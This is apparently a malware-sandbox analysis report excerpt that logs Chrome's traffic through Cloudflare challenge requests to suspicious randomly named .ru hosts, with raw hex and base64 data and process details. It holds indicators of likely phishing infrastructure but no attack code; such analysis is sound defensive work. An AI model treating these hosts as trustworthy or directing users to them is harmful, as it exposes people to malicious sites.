                                              2024-12-18 22:42:02 UTC1369INData Raw: 37 4b 72 75 4a 43 2b 6d 73 57 79 77 70 75 69 78 62 33 46 78 4c 37 4f 70 61 71 53 78 63 33 4d 79 4e 61 74 73 70 72 4e 31 64 54 61 31 74 75 2b 74 74 36 6a 34 63 48 5a 30 2b 69 2b 33 36 72 59 72 36 6e 44 30 75 37 6d 31 37 58 52 36 66 54 35 31 65 33 6e 2f 4e 4c 7a 76 72 62 54 39 75 2f 42 38 51 7a 47 36 67 66 2b 39 2b 72 63 43 76 77 52 43 67 58 55 38 74 63 53 2b 2f 49 53 44 68 59 56 47 78 63 63 48 66 59 66 48 79 45 68 47 78 51 68 46 69 63 41 4a 53 67 6e 4c 75 59 44 4c 76 49 74 4e 43 6f 79 4d 54 4d 7a 4f 43 6b 54 4f 6a 73 39 4f 54 63 77 4a 7a 4a 43 48 45 46 41 51 30 6f 44 48 30 77 6b 53 56 46 47 55 31 46 49 56 79 77 57 47 31 4e 61 45 79 39 61 4e 46 6c 55 59 7a 67 69 4a 31 70 69 59 56 78 72 51 43 34 76 5a 32 34 6e 51 32 35 59 62 57 68 33 54 44 6f 37 62 6e 5a 31
                                              Data Ascii: 7KruJC+msWywpuixb3FxL7OpaqSxc3MyNatsprN1dTa1tu+tt6j4cHZ0+i+36rYr6nD0u7m17XR6fT51e3n/NLzvrbT9u/B8QzG6gf+9+rcCvwRCgXU8tcS+/ISDhYVGxccHfYfHyEhGxQhFicAJSgnLuYDLvItNCoyMTMzOCkTOjs9OTcwJzJCHEFAQ0oDH0wkSVFGU1FIVywWG1NaEy9aNFlUYzgiJ1piYVxrQC4vZ24nQ25YbWh3TDo7bnZ1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.449777104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:03 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:04 UTC379INHTTP/1.1 404 Not Found
                                              Date: Wed, 18 Dec 2024 22:42:04 GMT
                                              Content-Type: application/json
                                              Content-Length: 7
                                              Connection: close
                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              cf-chl-out: +Kx5LjMh8gNNwI5lvoYZ8QxPZk5FrP5Mgbw=$8nwB9IVwbnG0hr4g
                                              Server: cloudflare
                                              CF-RAY: 8f42a9f8b84b4391-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:42:04 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                              Data Ascii: invalid


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449778104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:11 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              Content-Length: 33788
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Content-type: application/x-www-form-urlencoded
                                              CF-Chl-RetryAttempt: 0
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              CF-Challenge: oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://challenges.cloudflare.com
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:11 UTC16384OUTData Raw: 76 5f 38 66 34 32 61 39 61 30 30 61 32 64 37 32 38 36 3d 6d 53 34 63 48 71 6c 2d 39 54 53 6c 39 6f 2d 6c 78 73 45 73 6e 6f 7a 6c 48 73 66 63 32 59 6c 7a 6c 5a 6f 73 74 59 47 69 6c 6d 44 63 76 57 6c 69 73 31 73 57 57 6f 53 78 57 73 4e 7a 73 32 57 71 69 6c 70 6c 6c 7a 63 63 73 33 63 6f 6d 77 33 7a 73 38 7a 72 73 6f 57 71 54 73 36 57 38 56 62 4e 42 73 73 4a 73 5a 57 71 4a 73 25 32 62 61 43 63 24 6c 6e 4b 59 38 71 73 6c 4c 7a 73 41 36 73 54 6b 4f 65 47 42 77 56 78 69 24 7a 73 73 6b 39 73 45 51 73 44 2d 42 70 4a 73 6c 2d 73 71 41 64 61 75 38 70 70 73 71 2d 73 65 77 34 72 71 36 61 6b 6a 34 73 2b 2d 77 2b 4a 2d 6d 38 58 44 61 59 53 63 47 56 44 6f 38 43 58 73 73 65 6f 2d 33 7a 53 54 63 6b 54 44 33 6f 37 6e 64 36 77 56 56 39 52 62 4b 6f 36 6c 52 4e 78 63 52 5a 70
                                              Data Ascii: v_8f42a9a00a2d7286=mS4cHql-9TSl9o-lxsEsnozlHsfc2YlzlZostYGilmDcvWlis1sWWoSxWsNzs2Wqilpllzccs3comw3zs8zrsoWqTs6W8VbNBssJsZWqJs%2baCc$lnKY8qslLzsA6sTkOeGBwVxi$zssk9sEQsD-BpJsl-sqAdau8ppsq-sew4rq6akj4s+-w+J-m8XDaYScGVDo8CXsseo-3zSTckTD3o7nd6wVV9RbKo6lRNxcRZp
                                              2024-12-18 22:42:11 UTC16384OUTData Raw: 4c 38 44 59 69 63 41 53 6d 4d 54 57 47 7a 73 68 6a 49 50 79 39 36 73 5a 73 7a 57 6c 44 73 42 59 54 59 73 38 73 6b 6e 54 34 6c 7a 50 6f 73 6c 24 73 56 73 73 32 62 44 6c 71 59 6d 63 7a 46 7a 6c 73 34 57 7a 59 73 2b 73 5a 4e 38 64 73 35 73 6d 57 73 24 73 4f 73 45 57 47 24 73 45 57 46 76 35 44 6c 69 59 2d 59 54 56 73 49 73 51 59 54 2d 6c 46 73 65 59 54 73 38 37 37 57 54 47 6f 6c 69 59 45 59 73 63 6c 30 50 2b 50 70 73 6c 53 73 74 73 47 57 6c 69 73 6d 64 77 57 73 71 73 2b 73 6c 64 6c 52 6b 6d 37 38 24 73 68 59 54 63 71 70 73 53 73 55 63 71 56 58 7a 73 53 57 38 7a 6c 38 7a 6d 73 2b 44 6c 42 59 7a 73 7a 24 6c 65 73 57 59 71 63 73 38 73 7a 59 7a 34 71 45 73 45 2d 71 2d 73 57 73 77 57 47 41 6c 76 73 4e 62 6f 75 37 57 2b 75 41 47 38 43 37 62 57 56 71 59 73 6b 73 2b
                                              Data Ascii: L8DYicASmMTWGzshjIPy96sZszWlDsBYTYs8sknT4lzPosl$sVss2bDlqYmczFzls4WzYs+sZN8ds5smWs$sOsEWG$sEWFv5DliY-YTVsIsQYT-lFseYTs877WTGoliYEYscl0P+PpslSstsGWlismdwWsqs+sldlRkm78$shYTcqpsSsUcqVXzsSW8zl8zms+DlBYzsz$lesWYqcs8szYz4qEsE-q-sWswWGAlvsNbou7W+uAG8C7bWVqYsks+
                                              2024-12-18 22:42:11 UTC1020OUTData Raw: 56 53 47 66 6c 2d 61 70 4e 71 71 4d 58 72 4a 58 58 72 35 56 42 42 59 73 65 4e 41 4d 37 31 64 37 73 6b 4b 54 6d 64 64 36 77 6e 6a 57 69 42 4e 24 7a 37 34 71 24 73 66 74 49 52 52 2b 2d 69 53 4e 64 4e 33 63 32 32 45 32 6f 75 6c 6b 41 72 62 7a 42 61 44 73 71 59 6f 75 37 47 78 63 63 6c 59 73 5a 53 66 44 75 64 71 24 73 46 50 70 5a 57 69 63 77 39 71 73 72 6b 41 65 53 34 77 6c 63 73 68 59 7a 77 35 65 59 52 59 71 64 38 31 30 77 68 41 66 37 6e 30 78 68 68 66 55 52 57 46 6a 2d 44 73 46 30 42 6d 46 45 59 6e 73 38 57 66 34 6c 49 45 33 70 33 61 33 5a 73 44 57 6d 44 73 76 4f 50 54 30 42 6e 66 54 63 59 7a 69 45 4e 48 44 58 2b 34 49 51 73 62 54 52 53 45 4c 52 70 55 73 51 52 6a 54 50 33 70 51 52 35 30 78 53 4a 71 73 24 36 54 73 6c 79 55 4a 4e 56 53 73 4e 62 4e 4e 58 56 51
                                              Data Ascii: VSGfl-apNqqMXrJXXr5VBBYseNAM71d7skKTmdd6wnjWiBN$z74q$sftIRR+-iSNdN3c22E2oulkArbzBaDsqYou7GxcclYsZSfDudq$sFPpZWicw9qsrkAeS4wlcshYzw5eYRYqd810whAf7n0xhhfURWFj-DsF0BmFEYns8Wf4lIE3p3a3ZsDWmDsvOPT0BnfTcYziENHDX+4IQsbTRSELRpUsQRjTP3pQR50xSJqs$6TslyUJNVSsNbNNXVQ
                                              2024-12-18 22:42:12 UTC1312INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:42:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 4472
                                              Connection: close
                                              cf-chl-out-s: gK10VaUhcB99CpMc/ngWUbaNFAy1Ihz7B72MyY0TA/208ADraReWJ9MI2PebVd2PGc8YrOkA7L/TO9eRMnK8jsGJ74++5I+fT2FLcjd9PfaD/MT86dA3/DrkkyAC3yLhs4mDVt4WaMvKtupm5qmCjkBH4dmkJWMAH2x1xzGqamyeW2HgwJuqa4sUaD5BoCBo/mVtj59guBUaSrkqAgOfRNeRAxCBAJau3bI3AwPDZmY80LDCO6ONUA9fufh9+CT1VpOItfTuxdg5LcUxkGUou+0+KJ3LvqDW9batzpfS30rH4LWjWnyHzAFfNjeeUjmiQ/bWD3kGZnh62ckcGAO+IYJ/116BPJiELX3NL2Q+giwCjl3VmQkg8ntoKnv4KutrrcPZ0SZjto3dAP8beEC3EbjwyzLrNG40iNMjKslnxps99scF8blVObF4mdB33fGSwggieI0raM+07FvyF9/wQpeG1mB+nufW/MAC4V/tFkchV7PBVHHX49xlv/QDbFVXbyCwaUmI6s8zyJguGEfCjc2ZaAq+DeWbRdpHqy+pA59vXgr4QYU9LeSYlaV3R6jucpFGQka9pybI4mi5bxXT151DhRPy5lgwY9B//qinismOj0dSefMkCGh4hLO+A0Uz/5vomoY6HmLGehR+W/JtDz79PyavBM38VGpDCEg+b3kqYryyALo9B8rhCPgBqmZ2Jv7izuIkowa2IL4d7f6OWbYK0zuOCsrLqx2iy2UkKnrXRs8zbDEqkxpbYHm/RDAk/YqtjKYi8izDnf5Tytahj++2zjCb1QPNPjZWh9wfdZXUxhYLc3u4OxZ0PTm2oghSm5ZgWR4Vgb5wYYwFJhhZcJQCE3uqtrD4Sa7Onq8CjLalGKGgCyLyor95QTbS48D7k0b9KDgdJIC8kgrr2DzoUSlR93NmZsp3KYPrGoAOOajrcLqq8nmpopO09FKm3Cnim3o6jQ9/MlABiueT3uRA+yF02gE51D4FPO4dan2vv958pTmT9y [TRUNCATED]
                                              2024-12-18 22:42:12 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 2b 66 67 79 4c 63 6a 39 33 79 7a 72 73 63 7a 43 76 70 50 38 2f 52 57 34 2b 79 47 47 49 6c 51 34 4b 74 36 77 69 54 79 77 71 66 72 6e 57 48 54 61 56 66 5a 38 48 34 6e 39 43 42 71 62 45 48 69 67 72 51 52 68 39 55 49 42 54 6e 66 66 6d 65 48 62 77 59 48 35 78 50 4b 36 73 36 70 34 4d 4f 4c 77 4f 4e 34 58 79 58 31 63 57 6d 7a 63 6c 59 4a 45 4d 50 65 2b 79 69 38 3d 24 72 53 33 62 65 35 35 73 41 76 73 53 6d 51 4a 79 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 32 61 61 32 38 35 38 37 66 31 61 31 66 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                              Data Ascii: cf-chl-out: +fgyLcj93yzrsczCvpP8/RW4+yGGIlQ4Kt6wiTywqfrnWHTaVfZ8H4n9CBqbEHigrQRh9UIBTnffmeHbwYH5xPK6s6p4MOLwON4XyX1cWmzclYJEMPe+yi8=$rS3be55sAvsSmQJyServer: cloudflareCF-RAY: 8f42aa28587f1a1f-EWRalt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:42:12 UTC1193INData Raw: 57 33 35 75 58 30 36 50 63 56 35 4a 62 49 4a 49 5a 49 68 58 6d 56 6c 34 68 34 74 7a 61 56 68 5a 65 58 35 35 65 4a 56 34 64 32 65 70 6c 4a 57 70 70 4b 5a 78 61 34 79 6d 6c 48 56 32 70 70 6d 4c 65 71 71 6d 64 49 64 32 6b 59 79 51 77 37 2f 47 74 4a 65 2b 6c 38 4c 46 70 34 6a 4b 79 63 48 48 69 36 66 41 69 4c 61 51 6b 37 6a 56 6d 64 58 53 31 72 4c 56 79 72 69 2f 73 62 6d 69 35 64 4c 59 70 74 6e 41 37 4d 6a 68 79 61 71 39 70 74 36 31 74 50 62 32 2b 4c 76 54 2f 76 36 39 31 76 7a 4d 2b 4d 48 35 35 76 50 41 78 63 66 32 78 39 59 46 2b 77 59 4a 44 66 51 4a 42 2b 7a 50 45 39 45 50 44 2b 7a 72 2b 68 51 42 39 78 59 58 32 77 41 6f 35 4f 41 48 41 2b 63 6f 36 42 44 38 4c 66 6b 53 44 4f 37 74 45 41 67 6f 38 4f 77 35 47 78 77 78 4c 7a 77 54 4c 68 55 64 46 30 62 2b 52 7a 6b
                                              Data Ascii: W35uX06PcV5JbIJIZIhXmVl4h4tzaVhZeX55eJV4d2eplJWppKZxa4ymlHV2ppmLeqqmdId2kYyQw7/GtJe+l8LFp4jKycHHi6fAiLaQk7jVmdXS1rLVyri/sbmi5dLYptnA7Mjhyaq9pt61tPb2+LvT/v691vzM+MH55vPAxcf2x9YF+wYJDfQJB+zPE9EPD+zr+hQB9xYX2wAo5OAHA+co6BD8LfkSDO7tEAgo8Ow5GxwxLzwTLhUdF0b+Rzk
                                              2024-12-18 22:42:12 UTC1369INData Raw: 41 2f 6b 45 51 44 75 34 68 54 6a 42 4f 38 4a 39 65 48 79 35 76 6a 50 37 66 77 53 45 50 49 42 37 66 33 32 33 76 48 31 2b 79 67 46 36 50 37 6d 41 43 55 52 45 41 77 71 46 51 34 43 46 42 4c 7a 46 54 73 50 48 42 41 77 45 69 41 53 46 43 4d 41 51 42 4d 47 50 79 34 59 48 6b 4a 51 4a 69 39 45 45 54 59 54 49 30 51 78 4f 53 59 78 54 54 6f 57 57 6c 49 7a 48 44 31 6c 50 46 74 63 53 79 64 59 4f 53 78 4c 4a 30 35 63 53 45 39 67 58 6b 31 4e 4d 44 70 5a 4e 47 74 37 55 6f 46 73 54 31 51 38 67 47 52 57 59 6c 4a 6a 61 55 4e 6f 53 32 64 70 55 57 78 76 58 6d 46 52 63 49 64 51 55 32 75 4f 58 58 70 31 62 46 39 66 64 36 52 79 64 48 35 61 64 5a 65 48 69 61 4f 66 68 35 79 4a 63 6f 2b 41 6a 70 4a 7a 70 4a 47 36 6b 61 32 72 65 70 4b 77 66 5a 6d 54 73 4a 46 2f 6f 4b 53 6f 76 70 2b 33
                                              Data Ascii: A/kEQDu4hTjBO8J9eHy5vjP7fwSEPIB7f323vH1+ygF6P7mACUREAwqFQ4CFBLzFTsPHBAwEiASFCMAQBMGPy4YHkJQJi9EETYTI0QxOSYxTToWWlIzHD1lPFtcSydYOSxLJ05cSE9gXk1NMDpZNGt7UoFsT1Q8gGRWYlJjaUNoS2dpUWxvXmFRcIdQU2uOXXp1bF9fd6RydH5adZeHiaOfh5yJco+AjpJzpJG6ka2repKwfZmTsJF/oKSovp+3
                                              2024-12-18 22:42:12 UTC1369INData Raw: 6f 54 39 63 7a 58 35 4f 63 47 39 65 2f 70 32 75 33 38 49 50 50 33 41 4f 50 6c 33 79 50 67 41 41 63 62 47 67 49 4b 37 2b 6b 48 4a 41 6b 79 39 69 6b 52 39 51 38 74 47 66 55 53 4d 53 74 41 46 6a 55 62 42 41 55 41 4e 54 34 4c 52 42 6f 6f 50 6a 67 70 4c 30 51 4c 55 6b 67 57 49 78 52 58 4d 45 31 55 4d 79 35 52 50 69 30 34 50 7a 56 6e 4f 30 49 36 52 7a 39 61 58 45 5a 58 58 47 31 52 63 6e 4a 56 62 79 39 55 53 6b 77 37 61 6e 49 2b 4e 58 39 2f 53 6b 79 44 63 31 56 52 66 6e 64 41 53 56 31 31 65 59 5a 73 54 6d 6d 4f 55 57 4f 55 67 6e 6d 55 56 6f 39 37 57 6c 75 62 57 31 6c 67 6e 31 32 56 65 70 61 46 59 6e 79 4c 6f 61 6c 33 6d 6d 68 78 73 4a 53 44 72 4b 79 59 6f 61 69 7a 6f 33 71 70 6e 72 43 4f 74 5a 79 79 6b 72 32 50 75 35 69 34 78 4b 79 71 77 59 72 44 73 49 71 76 77
                                              Data Ascii: oT9czX5OcG9e/p2u38IPP3AOPl3yPgAAcbGgIK7+kHJAky9ikR9Q8tGfUSMStAFjUbBAUANT4LRBooPjgpL0QLUkgWIxRXME1UMy5RPi04PzVnO0I6Rz9aXEZXXG1RcnJVby9USkw7anI+NX9/SkyDc1VRfndASV11eYZsTmmOUWOUgnmUVo97WlubW1lgn12VepaFYnyLoal3mmhxsJSDrKyYoaizo3qpnrCOtZyykr2Pu5i4xKyqwYrDsIqvw
                                              2024-12-18 22:42:12 UTC541INData Raw: 44 2b 66 45 4f 42 77 41 51 32 67 4c 68 49 42 38 6a 42 2b 51 6e 48 69 45 4b 48 78 76 39 49 4f 4d 67 4b 44 48 74 4a 42 6b 35 43 43 6f 78 42 76 63 6f 2b 54 51 41 50 52 4c 38 4f 6a 67 47 52 44 73 37 47 30 6b 63 50 43 35 49 51 55 64 4b 4a 68 52 49 45 55 6b 5a 52 7a 70 56 4b 45 74 55 50 68 78 44 48 69 49 7a 56 31 31 48 4f 6c 68 6c 4e 7a 64 5a 50 6b 4e 52 61 45 4a 57 4d 47 6f 79 51 6d 6c 70 63 6b 64 74 61 33 5a 4f 50 48 77 2f 55 6e 39 6f 61 58 46 49 61 6f 47 41 69 57 39 6a 69 46 42 7a 54 33 61 44 68 31 4e 79 69 49 65 55 61 70 47 61 57 58 39 62 69 33 4b 5a 6f 36 4e 32 6e 57 57 55 65 71 46 6f 72 48 36 74 63 4b 36 64 66 33 57 66 6c 70 71 78 74 48 57 78 66 4c 70 2b 73 58 71 73 6b 71 32 46 71 4c 47 6e 68 63 53 4a 66 34 66 4b 6a 72 32 52 7a 61 65 79 7a 64 4f 57 75 74
                                              Data Ascii: D+fEOBwAQ2gLhIB8jB+QnHiEKHxv9IOMgKDHtJBk5CCoxBvco+TQAPRL8OjgGRDs7G0kcPC5IQUdKJhRIEUkZRzpVKEtUPhxDHiIzV11HOlhlNzdZPkNRaEJWMGoyQmlpckdta3ZOPHw/Un9oaXFIaoGAiW9jiFBzT3aDh1NyiIeUapGaWX9bi3KZo6N2nWWUeqForH6tcK6df3WflpqxtHWxfLp+sXqskq2FqLGnhcSJf4fKjr2RzaeyzdOWut


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.449779104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:13 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:14 UTC379INHTTP/1.1 404 Not Found
                                              Date: Wed, 18 Dec 2024 22:42:13 GMT
                                              Content-Type: application/json
                                              Content-Length: 7
                                              Connection: close
                                              cf-chl-out: wQV7PJRBo+kkqqUN9BpdmvRGCXyYyynK7TY=$382M1K3M0Yig3Vqz
                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Server: cloudflare
                                              CF-RAY: 8f42aa352f084273-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:42:14 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                              Data Ascii: invalid


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.449781172.67.188.294434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:15 UTC675OUTGET /wgnznjsslbwyvhnqbjccoqwhnbRFXKIKWAMAGLJDBIOOCGGCVJLTMTGTLMTMJAXNZNLYVYKFNTT HTTP/1.1
                                              Host: jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://to.eemjhiulz.ru
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://to.eemjhiulz.ru/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:16 UTC904INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:42:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBvvhuRGPkdoE9Kvdn9f9%2B5e1fktWUJ4jOJkwq3OjgrLxTF042iIA46Ks%2Fcp2rBnIKDh%2BdCMT8MpXqTioQM%2BW89tJnV3TDo%2BiV1%2FAwrl7VVoAoBfHljZGXTScnE2mNwu1oxjQHNvJlVP2I1cmICsw6h2NB9kGzOOhibZqTAJXejpUUjwnD7BuDVz9FEQKhk%2FOAA7ybYtDZmc6Hw%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f42aa3facde0cc0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1491&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1253&delivery_rate=1813664&cwnd=218&unsent_bytes=0&cid=b44b3f2057c99bc5&ts=889&x=0"
                                              2024-12-18 22:42:16 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                              Data Ascii: 11
                                              2024-12-18 22:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.449783104.21.7.2464434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:18 UTC471OUTGET /wgnznjsslbwyvhnqbjccoqwhnbRFXKIKWAMAGLJDBIOOCGGCVJLTMTGTLMTMJAXNZNLYVYKFNTT HTTP/1.1
                                              Host: jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:19 UTC914INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:42:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpTbiMor%2BuNsJeHkrNa%2BHRovcrO%2F%2F8%2FFliTlF6SDCc3ExlNTtkGvrM8NeaqvHlViMmaB6cMg7bGjSISf22Kj0%2BHUhDqcRac%2BPWRj3dblBDzH%2F4hmZNoFDwOy1ZhFADoQ1ydQL1cXigd0ohqTUYH0gkwLl2PahL7A8PwUmBIcWb%2BpRg1wMFA0Z2As69D%2F8iSZ42nGqKdi%2F1azb%2Bk%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f42aa55d99f32e8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1964&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1049&delivery_rate=1434184&cwnd=246&unsent_bytes=0&cid=487d4e9e31db0906&ts=909&x=0"
                                              2024-12-18 22:42:19 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                              Data Ascii: 11
                                              2024-12-18 22:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Click to jump to process

                                              Click to jump to process

                                              Click to jump to process

                                              Target ID:0
                                              Start time:17:41:20
                                              Start date:18/12/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:2
                                              Start time:17:41:23
                                              Start date:18/12/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,11789529794764029990,16469808625315113914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:3
                                              Start time:17:41:30
                                              Start date:18/12/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
